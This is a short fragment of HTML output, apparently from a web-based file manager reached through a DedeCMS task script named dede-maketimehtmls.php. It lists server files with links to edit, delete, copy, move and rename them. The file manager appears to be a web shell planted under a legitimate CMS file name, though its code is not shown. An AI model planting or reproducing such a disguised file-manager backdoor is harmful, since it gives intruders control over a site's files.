<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-maketimehtmls.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-maketimehtmls.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-maketimehtmls.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-maketimehtmls.php>Remame</a></td></tr>
<tr><td>dede-optimize-table.php</td><td>0.24 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-optimize-table.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-optimize-table.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-optimize-table.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-optimize-table.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-optimize-table.php>Remame</a></td></tr>
</table>